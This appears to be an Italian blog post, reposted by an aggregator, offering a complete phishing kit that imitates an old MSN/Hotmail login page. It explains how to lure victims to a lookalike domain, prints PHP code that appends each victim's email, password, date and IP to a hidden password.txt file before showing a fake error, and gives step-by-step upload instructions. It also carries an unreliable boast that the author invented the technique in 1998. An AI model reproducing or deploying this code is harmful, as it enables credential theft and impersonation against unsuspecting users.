NOTA BENE: Il Bloggatore ha rilevato dei problemi di collegamento con il blog indicato come fonte originale dell'articolo. Pertanto, al fine di consentire agli utenti di leggere questo articolo, se possibile, viene reso temporaneamente disponibile il post completo.
Premetto per tutti coloro che non ne fossero a conoscenza, che i Fake Login sono finte pagine web che hanno la stessa grafica della pagina madre e che servono per prelevare i dati dell’utente ignaro.
Mi spiego meglio. Io creo una pagina web uguale in tutto e per tutto a Facebook.com, e la pubblico su Faceboock.com ( noare che i due URL facebook quello vero e FacebookCk quello falso sono diversi. )
Fatto cio con una qualsiasi scusa invito l’utente a visitare il mio sito falso, spacciandolo per il reale sito facebook, e nel momento in cui, la “vittima” fa il login, la sua email e password vengono registrati ed inviatemi tramite email.
// < ![CDATA[
google_ad_client = "pub-5773599314987479"; /* 336x280, creato 17/12/09 KINGLION.IT*/ google_ad_slot = "6640171796"; google_ad_width = 336; google_ad_height = 280;
// ]]>
Al giorno d’oggi questa tecnica è molto diffusa, ed una delle piu usate in rete.
Tale tecnica fu inventata da me nel 1998, ed oggi a distanza di ben 12 anni vi propongo il primo codice FakeLogin completo di una vecchia pagina Hotmail Msn:
MSN Password Grabber Whit Fake-Login
Autore: KinG-LioN
MSN: msn@eurohackers.it
Info: info@eurohackers.it
web: Http://www.eurohackers.it
Creato: 11 Novembre 1998
Componenti fake-login:
Index.php
Config.php
colori.php
hotmail77×19.gif
msn.gif
Stile.inc
colori.txt
password.txt
#Perchè questo progetto?
Ho deciso di creare questo Password Grabber, che potete riadattare a qualsiasi stile, cambiando le immagine, la parte HTML
dell’index.php ed il colore da colori.txt, perche fino ad oggi TUTTI i password Grabber che ho visto in rete, si basano sui
cgi-bin, permettendoci di ricevere una E-mail coi dati inseriti dalla Vittima, ad un indirizzo da noi scelto.
Questo sistema, oltre ad essere obsoleto e anche inutile nel 90% dei casi.
Primo perche al giorno d’oggi è molto difficile riuscire a trovare un servizo gratuito che ci offre la gestione dei cgi-bin.
In secondo luogo, la vittima per inviarci i suoi dati deve inviare una “E-mail muta”, quindi risulta indispensabile
l’utilizzo da parte di quest’ultima di un client di posta elettronica quale ad esempio Outlook o Incredimail.
In Fine, anche nel caso in cui riuscissimo a trovare un fornitore di cgi-bin gratuito, e la nostra vittima usasse client di
posta elettronica, al momento in cui senderebbe i dati, il suo client lo avviserebbe che un messaggio muto sta per essere
inviato, chiedendo la conferma dell’invio alla vittima.
#Come nasce questa idea?
Un Giorno vidi in internet un fake-login che si basava su cgi-bin e decisi di provarlo, accorgendomi subito degli errori
sopra descritti.
Quindi mi chiesi… Ma ci sarà un modo per non usare la gestione di e-mail per ricevere i dati?
A quesl punto pensai ai numerevoli GuestBook php che non facevano uso di database sql, i quali una volta scritto un
messaggio, cliccando sull’apposito pulsante invia, stampava a video i campi immessi dall’utente su una pagina php.
Cosi Ho deciso di creare questo Fake-login basandomi su un GuestBook in php da me creato qualche mese prima.
Naturalmente Gli utenti non verranno mai rediretti sulla pagina nella quale vengono stampati i dati che dovrà rimanere
segreta per tutti, tranne che per l’admin, ma verranno rediretti su una pagina di errore personalizzabile.
[INIZIO FAKE-LOGIN]
Iniziare col creare un file da chiamere password.txt all’interno del quale verranno stampate automaticamente le password che
riuscirete a racimolare, ed uplodarlo nella folder in cui sono presenti i vari file dello script.
Scaricare le immagini hotmail77×19.gif e msn.gif dai seguenti link’s
kinglionweb.altervista.org/hotmail77×19.gif
kinglionweb.altervista.org/msn.gif ed uplodarle nella folder in cui avrete sharato i vari file.
[index.php]
//Script Powered by KinG-LioN – Info@eurohackers.it – http://www.eurohackers.it
include “colori.php” ;
include “config.php” ;
if(isset($_POST['submit'])){
$email = Strip_Tags($_POST['email']);
$pwd = Strip_Tags($_POST['nick']);
$ip = $_POST['ip'];
$data = date(’j/n/y – H:i’) ;
$dati_file = “password.txt”;
// |
$riga_messaggio = “$pwd|$email|$data|$ip”;
$riga_messaggio = str_replace(”\n”,”
“,$riga_messaggio);
$riga_messaggio = stripslashes($riga_messaggio);
$riga_messaggio .= “\n”;
$fp = fopen($dati_file, “a”);
if(!$fp) {
echo “Errore! Non si puo aprire il file delle password”;
exit;
}
$fw = fwrite($fp, $riga_messaggio);
$fc = fclose($fp);
echo “Errore di sistema. Riprovare più tardi.
“;
}
?>
MSN Phishing by KinG-LioN
Servizio di Gestione password fornito da MSN
echo ”
© 1998 Microsoft Corporation. Tutti i diritti riservati.“;
?>
[Fine index.php]
Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.
[colori.php]
[Fine colori.php]
Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.
[config.php]
[Fine config.php]
Copiare il tutto su NotePad, salvarlo con estensione .php ed uplodare il file.
[colori.txt]
#006699|white|4
[Fine colori.txt]
Copiare il tutto su NotePad, salvarlo con estensione .txt ed uplodare il file.
[Stile.inc]
echo ” “;
?>
[Fine Stile.inc]
Copiare il tutto su NotePad, salvarlo con estensione .inc ed uplodare il file.
[FINE FAKE-LOGIN]
#eurohackers.it
- Articolo precedente: Flash post: Le posizioni da non adottare con il notebook
- Articolo successivo: Servers get a makeover in 2010
SEGNALA / INVIA QUESTO POST:
Hai trovato questo articolo interessante? Iscriviti GRATIS ai nostri feeds!
